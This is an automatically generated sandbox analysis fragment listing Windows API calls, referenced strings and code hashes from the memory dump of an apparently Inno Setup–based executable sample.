                                                                                    • Instruction Fuzzy Hash: C4319234A006149FCB00FFA5DD5295E7BB5FB48708F51847AF800A73A2CB78AD049B9C
                                                                                    APIs
                                                                                    • GetFileAttributesA.KERNEL32(00000000,$pI,00000000,004967CA,?,?,00000000,0049A628), ref: 00496744
                                                                                    • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,$pI,00000000,004967CA,?,?,00000000,0049A628), ref: 0049676D
                                                                                    • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00496786
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Attributes$Move
                                                                                    • String ID: $pI$isRS-%.3u.tmp
                                                                                    • API String ID: 3839737484-4128586672
                                                                                    • Opcode ID: ac93eb15cc30df3555ec8ee47a98c48700fec702651561ff72d2a5defb372c3c
                                                                                    • Instruction ID: 5157d7ee42b340b6017ae31c030909d6195775d38fcd81d7ef1a959590527e8d
                                                                                    • Opcode Fuzzy Hash: ac93eb15cc30df3555ec8ee47a98c48700fec702651561ff72d2a5defb372c3c
                                                                                    • Instruction Fuzzy Hash: B7217371E00209AFCF00EFA9C8919AFBBB8EB44318F11457BB814B72D1D63C9E018A59
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042E94E
                                                                                    • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E954
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042E97D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                                    • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                                    • API String ID: 828529508-2866557904
                                                                                    • Opcode ID: 215bc1b7bc83ffdf68daf534a2d56b4e30a92487d6c5dc46c4b8b9a3e95a1be6
                                                                                    • Instruction ID: 1d35fa7d7a5cedd0232cd267efd28fbcee77054966ca8dd586963fa292d83f31
                                                                                    • Opcode Fuzzy Hash: 215bc1b7bc83ffdf68daf534a2d56b4e30a92487d6c5dc46c4b8b9a3e95a1be6
                                                                                    • Instruction Fuzzy Hash: 58F0C2E134062136E660A67BACC2F6B15CC8F94729F54003BB108EA2C2E96C8945426F
                                                                                    APIs
                                                                                    • RtlInitializeCriticalSection.KERNEL32(0049A420,00000000,00401A82,?,?,0040222E,021E1A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                    • RtlEnterCriticalSection.KERNEL32(0049A420,0049A420,00000000,00401A82,?,?,0040222E,021E1A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                    • LocalAlloc.KERNEL32(00000000,00000FF8,0049A420,00000000,00401A82,?,?,0040222E,021E1A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                    • RtlLeaveCriticalSection.KERNEL32(0049A420,00401A89,00000000,00401A82,?,?,0040222E,021E1A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                    • String ID: |Ed
                                                                                    • API String ID: 730355536-1702581799
                                                                                    • Opcode ID: 32c3f79555f68ec1bc11d54ffe7e2d8c2f8c3d101e81e839edcab80f59bb9ff8
                                                                                    • Instruction ID: b5067cfae5201e79e85213ffc863b03902d2ba9507e13bed97c350dada6f2a02
                                                                                    • Opcode Fuzzy Hash: 32c3f79555f68ec1bc11d54ffe7e2d8c2f8c3d101e81e839edcab80f59bb9ff8
                                                                                    • Instruction Fuzzy Hash: 9C01C0706442405EFB19AB69980A7263ED4D79574CF11803BF840A6AF1CAFC48A0CBAF
                                                                                    APIs
                                                                                    • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 004534BF
                                                                                      • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                    • MoveFileA.KERNEL32(00000000,00000000), ref: 004534E4
                                                                                      • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$AttributesDeleteErrorLastMove
                                                                                    • String ID: $pI$DeleteFile$MoveFile
                                                                                    • API String ID: 3024442154-1403374609
                                                                                    • Opcode ID: c3ba43a282ab64e4bd7258d017cc9cb201b328cdf06a165d105c793465f640fa
                                                                                    • Instruction ID: 0b1c975e4cad0da58cdf6a339e0cc25f4cbee2301ce5bab719f8a23037a79807
                                                                                    • Opcode Fuzzy Hash: c3ba43a282ab64e4bd7258d017cc9cb201b328cdf06a165d105c793465f640fa
                                                                                    • Instruction Fuzzy Hash: D4F062742141456AEB11FFA6D95266E67ECEB4434BFA0443BF800B76C3DA3C9E094929
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042E8E4,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E836
                                                                                    • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E83C
                                                                                    • InterlockedExchange.KERNEL32(0049A660,00000001), ref: 0042E84D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                                    • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                    • API String ID: 3478007392-2498399450
                                                                                    • Opcode ID: 66ed2d7305b3b0eec70b6170d071817c925b739ceb1fb38ca2eb5854fddf3c51
                                                                                    • Instruction ID: 89e1f457e47db82f9faa956fb130fb356174019ed1a27fb48ec6c883adef8708
                                                                                    • Opcode Fuzzy Hash: 66ed2d7305b3b0eec70b6170d071817c925b739ceb1fb38ca2eb5854fddf3c51
                                                                                    • Instruction Fuzzy Hash: E4E08CA1340310EADA107BA26D8AF1A2654A320715F8C443BF080620E1C7BC0C60C95F
                                                                                    APIs
                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00476644
                                                                                    • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,0047673B,0049B050,00000000), ref: 00476657
                                                                                    • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0047665D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                                    • String ID: AllowSetForegroundWindow$user32.dll
                                                                                    • API String ID: 1782028327-3855017861
                                                                                    • Opcode ID: 23d9d9cc46354639512b471ab02422c9b54f1bfd7ccda73b957914f4bb9bf9af
                                                                                    • Instruction ID: 0cf89beef61ef8a76223fb5aa8394d6e95b25c45a6fd57a36df02fca6db0c00c
                                                                                    • Opcode Fuzzy Hash: 23d9d9cc46354639512b471ab02422c9b54f1bfd7ccda73b957914f4bb9bf9af
                                                                                    • Instruction Fuzzy Hash: 79D0A9E0200F0169DD10B3F2AD47EAB329ECE84B10B92843B7408E3182CA3DE8404E3C
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004970B6), ref: 0044EFD3
                                                                                    • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044EFD9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: NotifyWinEvent$dD$user32.dll
                                                                                    • API String ID: 1646373207-754903266
                                                                                    • Opcode ID: dc61cc67552be4efe4d14fef26ae15ab6e12dbd37892583342a89fc102010d4c
                                                                                    • Instruction ID: d2dc615c88fd328006faf79361cd74abdd3d8da8a377be2bcafca06377aa3dce
                                                                                    • Opcode Fuzzy Hash: dc61cc67552be4efe4d14fef26ae15ab6e12dbd37892583342a89fc102010d4c
                                                                                    • Instruction Fuzzy Hash: 37E012F0E41340AEFB00BFFB984271A3AA0B76431CB00007FB40066292CB7C48284A5F
                                                                                    APIs
                                                                                    • BeginPaint.USER32(00000000,?), ref: 00416C62
                                                                                    • SaveDC.GDI32(?), ref: 00416C93
                                                                                    • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D55), ref: 00416CF4
                                                                                    • RestoreDC.GDI32(?,?), ref: 00416D1B
                                                                                    • EndPaint.USER32(00000000,?,00416D5C,00000000,00416D55), ref: 00416D4F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                    • String ID:
                                                                                    • API String ID: 3808407030-0
                                                                                    • Opcode ID: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
                                                                                    • Instruction ID: c70ebf24aed337d2f43398dc79d2f74fb7d9fd2825851e0a0ce007a429ecfdc3
                                                                                    • Opcode Fuzzy Hash: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
                                                                                    • Instruction Fuzzy Hash: D7413C70A04204AFDB04DB99D985FAE77F9EB48304F1640AEE4059B362D778ED85CB58
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
                                                                                    • Instruction ID: fc599d946787c0506e623d191f8eefd10b4a308858d20a9272ac2d3790a9447e
                                                                                    • Opcode Fuzzy Hash: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
                                                                                    • Instruction Fuzzy Hash: A1314F746047449FC320EF69C984BABB7E8AF89314F04891EF9D9C3752C638EC858B19
                                                                                    APIs
                                                                                    • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429818
                                                                                    • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429847
                                                                                    • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429863
                                                                                    • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042988E
                                                                                    • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 004298AC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: 5944dffaa8c0b8b44a765cdc0198bb50be024f609766e5ff2339194419bf2bce
                                                                                    • Instruction ID: c447c4a9eb68fcc7219df142ffdb21218ba7f26748626b58278b549ffff81a32
                                                                                    • Opcode Fuzzy Hash: 5944dffaa8c0b8b44a765cdc0198bb50be024f609766e5ff2339194419bf2bce
                                                                                    • Instruction Fuzzy Hash: 3321AF707507057AE710BB66CC82F5B76ACEB42708F94043EB541AB2D2DF78ED41825C
                                                                                    APIs
                                                                                    • GetSystemMetrics.USER32(0000000B), ref: 0041BBDA
                                                                                    • GetSystemMetrics.USER32(0000000C), ref: 0041BBE4
                                                                                    • 73A0A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC22
                                                                                    • 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BD8D,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC69
                                                                                    • DeleteObject.GDI32(00000000), ref: 0041BCAA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: MetricsSystem$A16310A570DeleteObject
                                                                                    • String ID:
                                                                                    • API String ID: 2246927583-0
                                                                                    • Opcode ID: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
                                                                                    • Instruction ID: d912de8c3c57523408de13a46bdb54385142bc6a2202aaac6113f7462e2bca5d
                                                                                    • Opcode Fuzzy Hash: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
                                                                                    • Instruction Fuzzy Hash: CE314F74E00209EFDB04DFA5C941AAEB7F5EB48700F11856AF514AB381D7789E40DB98
                                                                                    APIs
                                                                                      • Part of subcall function 0045C76C: SetLastError.KERNEL32(00000057,00000000,0045C838,?,?,?,?,00000000), ref: 0045C7D7
                                                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725E9
                                                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725FF
                                                                                    Strings
                                                                                    • Setting permissions on registry key: %s\%s, xrefs: 004725AE
                                                                                    • Could not set permissions on the registry key because it currently does not exist., xrefs: 004725F3
                                                                                    • Failed to set permissions on registry key (%d)., xrefs: 00472610
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast
                                                                                    • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                                    • API String ID: 1452528299-4018462623
                                                                                    • Opcode ID: b6a47f64f510fce16551a7a9453ce12765f8589f174dbaf3fa05134ae08179ca
                                                                                    • Instruction ID: 4334e49d385bf692f2cc32478bc4a2497c1f2fe716dd62bcd395c3eafaa3e5f2
                                                                                    • Opcode Fuzzy Hash: b6a47f64f510fce16551a7a9453ce12765f8589f174dbaf3fa05134ae08179ca
                                                                                    • Instruction Fuzzy Hash: 9C218370A046445FCB01DBAAD9827EEBBE4EB49314F50817BE408E7392D7B85D05CBA9
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                    • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                                    • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$AllocString
                                                                                    • String ID:
                                                                                    • API String ID: 262959230-0
                                                                                    • Opcode ID: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
                                                                                    • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                                    • Opcode Fuzzy Hash: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
                                                                                    • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                                    APIs
                                                                                    • 73A08830.GDI32(00000000,00000000,00000000), ref: 00414429
                                                                                    • 73A022A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414431
                                                                                    • 73A08830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414445
                                                                                    • 73A022A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041444B
                                                                                    • 73A0A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414456
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: A022A08830$A480
                                                                                    • String ID:
                                                                                    • API String ID: 3036329673-0
                                                                                    • Opcode ID: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
                                                                                    • Instruction ID: 307ee49d89b37f6f535ee678b6e17b633f9af621dfcf88cb872c79a1e2d754b8
                                                                                    • Opcode Fuzzy Hash: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
                                                                                    • Instruction Fuzzy Hash: A901D47121C3406AD200B63D8C45B9F6BEC8FC6314F05546EF494D7382C97ACC018765
                                                                                    APIs
                                                                                    • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 0040700B
                                                                                    • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 00407085
                                                                                    • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070DD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Enum$NameOpenResourceUniversal
                                                                                    • String ID: Z
                                                                                    • API String ID: 3604996873-1505515367
                                                                                    • Opcode ID: 9cf142189d4ecfc6757bb5486cc46db394a4e60b729a9f9f9915b5c39fe8e999
                                                                                    • Instruction ID: 2d8f00a968b5306eb49df96258ffff6df6a72a1db963417fd4edcb7bb2ad48f8
                                                                                    • Opcode Fuzzy Hash: 9cf142189d4ecfc6757bb5486cc46db394a4e60b729a9f9f9915b5c39fe8e999
                                                                                    • Instruction Fuzzy Hash: C1513070E04208ABDB15DF55CD41A9EBBB9FB49304F1041BAE910BB3D1C778AE458F5A
                                                                                    APIs
                                                                                    • SetRectEmpty.USER32(?), ref: 0044C8A2
